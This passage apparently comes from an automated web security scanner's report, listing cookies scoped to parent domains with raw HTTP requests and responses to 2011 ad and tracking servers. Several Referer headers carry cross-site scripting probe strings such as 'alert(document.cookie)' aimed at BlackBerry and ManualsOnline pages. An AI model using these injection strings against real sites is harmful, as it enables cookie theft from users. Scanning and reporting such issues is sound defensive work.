rdrlst=4140o2ylebnns0000000z100207dpletz4d0000000v100210e5lg1nei0000000510020mmnlebnns0000000z100210rdlg1vir0000000410020x1blebnns0000000z10020xo1lebnns0000000z10020eh5lf17qf0000000r100206bylemlne0000000x10020w3clebnns0000000z100207gmlebnns0000000z10020jv6lebnns0000000z10020j4ilew2e20000000t10020xthlebnns0000000z10020fullf8gij0000000n100210f6lg1nei0000000510021196lfzx0l00000006100200c9lfk1rn0000000k10020jillebnns0000000z10021194lg3y5y0000000310020fuqlegh2b0000000y10020b6mlf17qk0000000q10020mz1lebnns0000000z10020cajlfk1rn0000000k10020p7vlebnns0000000z100207vglfk1rn0000000k10020xvslebnns0000000z10021192lg5l2h00000002100210ellg1nei0000000510020xuklebnns0000000z10020jk7lebnns0000000z10020x1jlebnns0000000z10020yiplebnns0000000z10020cbnlfk1rn0000000k10020xwflebnns0000000z10020yh0lebnns0000000z10020e4vlebnns0000000z100210e9lg1nei0000000510020xwblebnns0000000z10020jwblfk1rn0000000k1002; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo0000000p1002060720682gletz4d0pqa500a0l000400100ag2leqh191fia600w1002060720682hlebnns1o9ct00z100206072069zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300l10020607206820lebnns181qq00e0l000400100b0olfjpei0g7m300l10020607206ab4lebnns1o9ct00z100206072069szlebnns1o9ct00z100206072068wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1pi9400y10020607206al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei0g7m300l100206072068bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns1o9ct00k10020606206b08lfjpei0g7m300l1002060720640slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc0000000m1002060720640uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Location: http://ad.yieldmanager.com/pixel?t=2&id=702840 Content-Length: 0 Date: Sat, 05 Feb 2011 21:50:02 GMT
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3aa5/3/0/*/v;233997820;0-0;0;57848017;1-468/60;39912829/39930616/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/personalsavings.americanexpress.com/savings-product.html HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/savings-product.html Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 22:24:49 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click%3Bh%3Dv8/3aa5/3/0/%2a/v%3B233997820%3B0-0%3B0%3B57848017%3B1-468/60%3B39912829/39930616/1%3B%3B~okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B~sscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/2179194/1-HYSA_RateV2_468x60_30k.swf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/savings-product.html Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 21:49:07 GMT Server: GFE/2.0 Content-Type: text/html
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|2782903/965205/15010,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clk;235229193;58835998;e HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://radioshack.shoplocal.com/radioshack/default.aspx? Set-Cookie: id=c653243310000d9|2782903/965205/15010,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 22:24:01 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/ Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 21:50:26 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259592C1875273789S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU5MkMxODc1MjczNzg5UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:05:24 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C40812S1469378459041154054T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C40812S1469378459041154054T0I14786739C0T0; expires=Sat, 07-May-2011 17:05:24 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.zanox-affiliate.de/tpv/?11259592C1875273789S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&zanpid=14786739C435671106T1469378459041154054 pragma: no-cache cache-control: no-store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aclk HTTP/1.1 Host: adclick.g.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /is/us.blackberry.com?U=/assets_refresh/images/dropNavArrow.png&V=3-wtrzWKMz5TRDi%2fSd+CSqwZrU0+tOXRhkdjDeSgoXXKsKt5tkWeZJR6ejK+C%2fyzfo&I=28F5F496E208D76&D=blackberry.com&01AD=1& HTTP/1.1 Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://us.blackberry.com/smartphones/94178%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed0d62204af5/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 01AI=2-2-25EB5C6599E919113732004AA184A52EB733C740467AAF1D7D81573472EEC61D-9096F2ABE2A1219AAEF0C5B86F175ABE372822FF2ED8C84CDF5447BE0CBE5075
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://us.blackberry.com/assets_refresh/images/dropNavArrow.png?01AD=3aHKJGBey5UiG2d2rLy9DNRi960kdX5X5YBju1dsrFZME9vXtP4bUsw&01RI=28F5F496E208D76&01NA= Expires: Sun, 06 Feb 2011 13:32:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 13:32:25 GMT Connection: close Set-Cookie: 01AI=2-2-E6B4582CF8328068796C2B5053C28D2C377E8430D1A1C755D330840B4F6A6B0A-676C59CB938D0430952A82220209EB8847971233F1926F5A520082B9D9775BCB; expires=Mon, 06-Feb-2012 13:32:25 GMT; path=/; domain=.abmr.net P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/ck/14302-119028-23636-2 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113; svid=517004695355;
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Set-Cookie: mojo2=14302:23636; expires=Tue, 5-Feb-2013 5:38:22 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://www.constantcontact.com/email-marketing/index.jsp?cc=CLK_14302119028236362 Content-Length: 0 Date: Sat, 05 Feb 2011 22:43:24 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/ck/9700-118565-26469-2 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113; svid=517004695355;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Set-Cookie: mojo2=9700:26469; expires=Wed, 6-Feb-2013 6:25:17 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Content-Type: text/html Content-Length: 478 Date: Sun, 06 Feb 2011 16:00:26 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/js/14302-119028-23636-2?mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/14302:28901/1551:17023/11293:3113
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Set-Cookie: mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113; expires=Tue, 5-Feb-2013 5:03:01 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://img.mediaplex.com/content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&placementid=14302119028236362& Content-Length: 0 Date: Sat, 05 Feb 2011 22:25:40 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/nc/14302-119028-23636-2 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113; svid=517004695355;
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Set-Cookie: mojo2=14302:23636; expires=Tue, 5-Feb-2013 6:09:26 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://www.constantcontact.com/email-marketing/index.jsp?cc=CLK_14302119028236362 Content-Length: 0 Date: Sat, 05 Feb 2011 22:43:18 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d852910/8/40051907/decide.php?ord=1296942847 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296999600.136,wait-%3E10000,&1296999637491 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; BMX_G=method->-1,ts->1296999600; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: image/gif Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296999600%2E136%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com; Content-length: 42 P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25198
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: axptravel.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110205214753 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sat, 05 Feb 2011 21:47:55 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Mon, 04-Feb-2013 21:47:55 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p HTTP/1.1 Host: b.scorecardresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UID=1f00d615-24.143.206.88-1294170954;
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sat, 05 Feb 2011 22:44:03 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Mon, 04-Feb-2013 22:44:03 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=4&c2=p68511049&c3=264255445&c4=185637072&c5=1&c6=6&c7=mon%20jan%2031%2016%3A31%3A23%202011&c8=http%3A%2F%2Fredacted%2FMRT%2Fiview%2F264255445%2Fdirect%3Bwi.300%3Bhi.250%2F01%2F1354764918%3Fclick%3Dhttp%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253DL%2526ai%253DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%2526num%253D1%2526sig%253DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%2526client%253Dca-pub-7786708287155161%2526adurl%253D&c9=DYN_Launch_Adoption_300x250_v2&c10=&c15=&1296999637359 HTTP/1.1 Host: b.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: 